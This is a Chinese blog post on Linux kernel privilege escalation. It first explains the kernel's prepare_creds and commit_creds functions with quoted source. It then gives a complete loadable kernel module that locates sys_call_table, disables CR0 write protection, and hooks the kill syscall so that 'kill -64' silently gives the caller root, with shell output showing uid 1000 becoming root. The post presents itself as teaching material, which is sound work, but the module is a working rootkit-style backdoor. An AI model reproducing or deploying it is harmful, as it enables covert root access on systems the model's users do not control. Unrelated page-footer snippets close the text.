- 前言
- 一、简介
- 1.1 prepare_creds
- 1.2 commit_creds
- 二、demo
- 参考资料
在这篇文章:Linux 安全 - Credentials 介绍了 Task Credentials 相关的知识点,接下来给出一个内核编程提权的例程。
内核模块提权主要借助于 prepare_creds 函数和 commit_creds 函数,简单代码示例如下:
void set_root(void)
{struct cred *root;root = prepare_creds();if (root == NULL)return;/* Set the credentials to root */commit_creds(root);
struct cred {kuid_t uid; /* real UID of the task */kgid_t gid; /* real GID of the task */kuid_t suid; /* saved UID of the task */kgid_t sgid; /* saved GID of the task */kuid_t euid; /* effective UID of the task */kgid_t egid; /* effective GID of the task */kuid_t fsuid; /* UID for VFS ops */kgid_t fsgid; /* GID for VFS ops */
在set_root函数中把struct cred 以上成员改为0。
/* Whatever calls this function will have it's creds struct replaced* with root's */
void set_root(void)
{/* prepare_creds returns the current credentials of the process */struct cred *root;root = prepare_creds();if (root == NULL)return;/* Run through and set all the various *id's to 0 (root) */root->uid.val = root->gid.val = 0;root->euid.val = root->egid.val = 0;root->suid.val = root->sgid.val = 0;root->fsuid.val = root->fsgid.val = 0;/* Set the cred struct that we've modified to that of the calling process */commit_creds(root);
1.1 prepare_creds
static struct kmem_cache *cred_jar;
/*** prepare_creds - Prepare a new set of credentials for modification** Prepare a new set of task credentials for modification. A task's creds* shouldn't generally be modified directly, therefore this function is used to* prepare a new copy, which the caller then modifies and then commits by* calling commit_creds().** Preparation involves making a copy of the objective creds for modification.** Returns a pointer to the new creds-to-be if successful, NULL otherwise.** Call commit_creds() or abort_creds() to clean up.*/
struct cred *prepare_creds(void)
{struct task_struct *task = current;const struct cred *old;struct cred *new;validate_process_creds();new = kmem_cache_alloc(cred_jar, GFP_KERNEL);if (!new)return NULL;kdebug("prepare_creds() alloc %p", new);old = task->cred;memcpy(new, old, sizeof(struct cred));new->non_rcu = 0;atomic_set(&new->usage, 1);set_cred_subscribers(new, 0);get_group_info(new->group_info);get_uid(new->user);get_user_ns(new->user_ns);#ifdef CONFIG_KEYSkey_get(new->session_keyring);key_get(new->process_keyring);key_get(new->thread_keyring);key_get(new->request_key_auth);
#endif#ifdef CONFIG_SECURITYnew->security = NULL;
#endifif (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)goto error;validate_creds(new);return new;error:abort_creds(new);return NULL;
prepare_creds() 函数的目的是为修改准备一个新的任务凭证集。它设计为创建现有凭证的副本,以便调用者可以在不直接修改原始凭证的情况下修改副本。这确保了在使用 commit_creds() 提交之前,原始凭证保持不变。
(1)内存分配:该函数使用 kmem_cache_alloc() 为新凭证结构(new)分配内存。它利用了 cred_jar 内存缓存,这是一个预分配的凭证内存池。这有助于通过避免频繁的动态内存分配来提高性能。
(2)复制现有凭证:函数使用 memcpy() 将现有凭证(old)的内容复制到新分配的凭证(new)中。这创建了一个初始的凭证副本,可以独立地进行修改。
(3)设置凭证属性:在复制现有凭证之后,函数为新凭证设置各种属性。这些属性包括 non_rcu(设置为 0)、usage(设置为 1,表示对凭证的一个引用)以及与组信息、用户标识符和用户命名空间相关的其他字段。
(4)密钥管理:如果内核配置选项 CONFIG_KEYS 已启用,函数调用 key_get() 来增加凭证结构中与密钥相关字段的引用计数。这确保了与凭证关联的密钥得到正确的计数,避免了过早释放。
(5)安全模块集成:如果内核配置选项 CONFIG_SECURITY 已启用,新凭证的 security 字段将设置为 NULL。该字段通常用于存储与凭证关联的安全模块特定数据的引用。
(6)安全模块钩子:函数调用安全模块提供的 security_prepare_creds() 钩子。这允许安全模块对新凭证执行任何必要的操作或验证。如果安全模块返回小于 0 的值,表示发生错误,函数跳转到 error 标签处处理错误并进行清理。
(7)验证:在准备新凭证之后,函数调用 validate_creds() 来验证新凭证结构的完整性和一致性。
(8)返回值:如果准备成功,函数返回新凭证的指针(new)。如果在准备过程中发生任何错误,函数调用 abort_creds() 释放已分配的内存,并返回 NULL。
通过结合使用 prepare_creds() 和 commit_creds(),Linux 内核提供了一个安全的机制,在修改任务凭证时保持原始凭证不变,直到更改被提交。这是内核安全基础设施的重要组成部分,允许对系统内的访问权限和特权进行细粒度控制。
1.2 commit_creds
/*** commit_creds - Install new credentials upon the current task* @new: The credentials to be assigned** Install a new set of credentials to the current task, using RCU to replace* the old set. Both the objective and the subjective credentials pointers are* updated. This function may not be called if the subjective credentials are* in an overridden state.** This function eats the caller's reference to the new credentials.** Always returns 0 thus allowing this function to be tail-called at the end* of, say, sys_setgid().*/
int commit_creds(struct cred *new)
{struct task_struct *task = current;const struct cred *old = task->real_cred;kdebug("commit_creds(%p{%d,%d})", new,atomic_read(&new->usage),read_cred_subscribers(new));BUG_ON(task->cred != old);
#ifdef CONFIG_DEBUG_CREDENTIALSBUG_ON(read_cred_subscribers(old) < 2);validate_creds(old);validate_creds(new);
#endifBUG_ON(atomic_read(&new->usage) < 1);get_cred(new); /* we will require a ref for the subj creds too *//* dumpability changes */if (!uid_eq(old->euid, new->euid) ||!gid_eq(old->egid, new->egid) ||!uid_eq(old->fsuid, new->fsuid) ||!gid_eq(old->fsgid, new->fsgid) ||!cred_cap_issubset(old, new)) {if (task->mm)set_dumpable(task->mm, suid_dumpable);task->pdeath_signal = 0;/** If a task drops privileges and becomes nondumpable,* the dumpability change must become visible before* the credential change; otherwise, a __ptrace_may_access()* racing with this change may be able to attach to a task it* shouldn't be able to attach to (as if the task had dropped* privileges without becoming nondumpable).* Pairs with a read barrier in __ptrace_may_access().*/smp_wmb();}/* alter the thread keyring */if (!uid_eq(new->fsuid, old->fsuid))key_fsuid_changed(new);if (!gid_eq(new->fsgid, old->fsgid))key_fsgid_changed(new);/* do it* RLIMIT_NPROC limits on user->processes have already been checked* in set_user().*/alter_cred_subscribers(new, 2);if (new->user != old->user)atomic_inc(&new->user->processes);rcu_assign_pointer(task->real_cred, new);rcu_assign_pointer(task->cred, new);if (new->user != old->user)atomic_dec(&old->user->processes);alter_cred_subscribers(old, -2);/* send notifications */if (!uid_eq(new->uid, old->uid) ||!uid_eq(new->euid, old->euid) ||!uid_eq(new->suid, old->suid) ||!uid_eq(new->fsuid, old->fsuid))proc_id_connector(task, PROC_EVENT_UID);if (!gid_eq(new->gid, old->gid) ||!gid_eq(new->egid, old->egid) ||!gid_eq(new->sgid, old->sgid) ||!gid_eq(new->fsgid, old->fsgid))proc_id_connector(task, PROC_EVENT_GID);/* release the old obj and subj refs both */put_cred(old);put_cred(old);return 0;
commit_creds() 负责处理进程的凭证安装。它确保凭证的一致性和完整性,更新各种属性,并在必要时发送通知。
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/syscalls.h>
#include <linux/version.h>#define LICENSE "GPL"
#define AUTHOR "Chronolator"
#define DESCRIPTION "LKM example of setting process to root perms."
#define VERSION "0.01"/* Module meta data */
MODULE_VERSION(VERSION);/* Preprocessing Definitions */
#define MODULE_NAME "SetRootPerms"
#if LINUX_VERSION_CODE >= KERNEL_VERSION(5,7,0)#define KPROBE_LOOKUP 1#include <linux/kprobes.h>static struct kprobe kp = {.symbol_name = "kallsyms_lookup_name"};
#endif/* Global Variables */
unsigned long cr0;
static unsigned long *__sys_call_table;/* Function Prototypes*/
unsigned long *get_syscall_table_bf(void);
#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)static inline void write_cr0_forced(unsigned long val);
static inline void SetProtectedMode(void);
static inline void SetRealMode(void);
void give_root(void);
#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)typedef asmlinkage long (*t_syscall)(const struct pt_regs *regs);static t_syscall original_kill;//asmlinkage long (*original_kill)(const struct pt_regs *regs); //OLDasmlinkage long hacked_kill(const struct pt_regs *regs);
#elsetypedef asmlinkage long (*original_kill_t)(pid_t, int);original_kill_t original_kill;//asmlinkage long (*original_kill)(int pid, int sig); //OLDasmlinkage long hacked_kill(int pid, int sig);
#endif/* Get syscall table */
unsigned long *get_syscall_table_bf(void) {unsigned long *syscall_table;#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 4, 0)#ifdef KPROBE_LOOKUPtypedef unsigned long (*kallsyms_lookup_name_t)(const char *name);kallsyms_lookup_name_t kallsyms_lookup_name;register_kprobe(&kp);kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr;unregister_kprobe(&kp);#endifsyscall_table = (unsigned long*)kallsyms_lookup_name("sys_call_table");return syscall_table;#elseunsigned long int i;for (i = (unsigned long int)sys_close; i < ULONG_MAX; i += sizeof(void *)) {syscall_table = (unsigned long *)i;if (syscall_table[__NR_close] == (unsigned long)sys_close)return syscall_table;}return NULL;#endif
}/* Bypass write_cr0() restrictions by writing directly to the cr0 register */
static inline void write_cr0_forced(unsigned long val) {unsigned long __force_order;asm volatile("mov %0, %%cr0": "+r"(val), "+m"(__force_order));
#endif/* Set CPU to protected mode by modifying value stored in cr0 register */
static inline void SetProtectedMode(void) {
#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)write_cr0_forced(cr0);
}/* Set CPU to real mode by modifying value stored in cr0 register */
static inline void SetRealMode(void) {
#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)write_cr0_forced(cr0 & ~0x00010000);
#elsewrite_cr0(cr0 & ~0x00010000);
}/* Misc Functions */
void give_root(void) {
#if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 29)current->uid = current->gid = 0;current->euid = current->egid = 0;current->suid = current->sgid = 0;current->fsuid = current->fsgid = 0;
#elsestruct cred *newcreds;newcreds = prepare_creds();if (newcreds == NULL)return;#if LINUX_VERSION_CODE >= KERNEL_VERSION(3, 5, 0) && defined(CONFIG_UIDGID_STRICT_TYPE_CHECKS) || LINUX_VERSION_CODE >= KERNEL_VERSION(3, 14, 0)newcreds->uid.val = newcreds->gid.val = 0;newcreds->euid.val = newcreds->egid.val = 0;newcreds->suid.val = newcreds->sgid.val = 0;newcreds->fsuid.val = newcreds->fsgid.val = 0;#elsenewcreds->uid = newcreds->gid = 0;newcreds->euid = newcreds->egid = 0;newcreds->suid = newcreds->sgid = 0;newcreds->fsuid = newcreds->fsgid = 0;#endifcommit_creds(newcreds);
}/* Hacked Syscalls */
asmlinkage long hacked_kill(const struct pt_regs *regs) {printk(KERN_WARNING "%s module: Called syscall kill using new pt_regs", MODULE_NAME);pid_t pid = regs->di;int sig = regs->si;if(sig == 64) {printk(KERN_INFO "%s module: Giving root\n", MODULE_NAME);give_root(); return 0;}return (*original_kill)(regs);
asmlinkage long hacked_kill(pid_t pid, int sig) {printk(KERN_WARNING "%s module: Called syscall kill", MODULE_NAME);//struct task_struct *task;if(sig == 64) {printk(KERN_INFO "%s module: Giving root using old asmlinkage\n", MODULE_NAME);give_root(); return 0;}return (*original_kill)(pid, sig);
#endif/* Init */
static int __init run_init(void) {printk(KERN_INFO "%s module: Initializing module\n", MODULE_NAME);// Get syscall table __sys_call_table = get_syscall_table_bf();if (!__sys_call_table)return -1;// Get the value in the cr0 registercr0 = read_cr0();// Set the actual syscalls to the "original" linked versions (save the actual in another variable)#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)original_kill = (t_syscall)__sys_call_table[__NR_kill];//original_kill = (original_kill)__sys_call_table[__NR_kill]; //OLD#elseoriginal_kill = (original_kill_t)__sys_call_table[__NR_kill];//original_kill = (void*)__sys_call_table[__NR_kill]; //OLD#endif// Set the syscalls to your modified versionsSetRealMode();__sys_call_table[__NR_kill] = (unsigned long)hacked_kill;SetProtectedMode();return 0;
}/* Exit */
static void __exit run_exit(void) {printk(KERN_INFO "%s module: Exiting module\n", MODULE_NAME);// Set the syscalls back to the "original" linked versionsSetRealMode();__sys_call_table[__NR_kill] = (unsigned long)original_kill;SetProtectedMode();return;
$ id
uid=1000(yl) gid=1000(yl)
$ kill -64 0
$ id
uid=0(root) gid=0(root)

Linux 安全 - 内核提权
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城市化进程中,电梯与我们的生活息息相关。高层住宅、医院、商场、学校、车站等各种商业体建筑、公共建筑中电梯为我们生活工作提供了诸多便利。 保障电梯系统的安全至关重要!特别是电梯机房和电梯基坑可通过智能化改造提高其安全性和稳定性。例如在暴风…...

Java异常:基本概念、分类和处理 在Java编程中,异常处理是一个非常重要的部分。了解如何识别、处理和避免异常对于编写健壮、可维护的代码至关重要。本文将介绍Java异常的基本概念、分类和处理方法,并通过简单的代码示例进行说明。 一、什么…...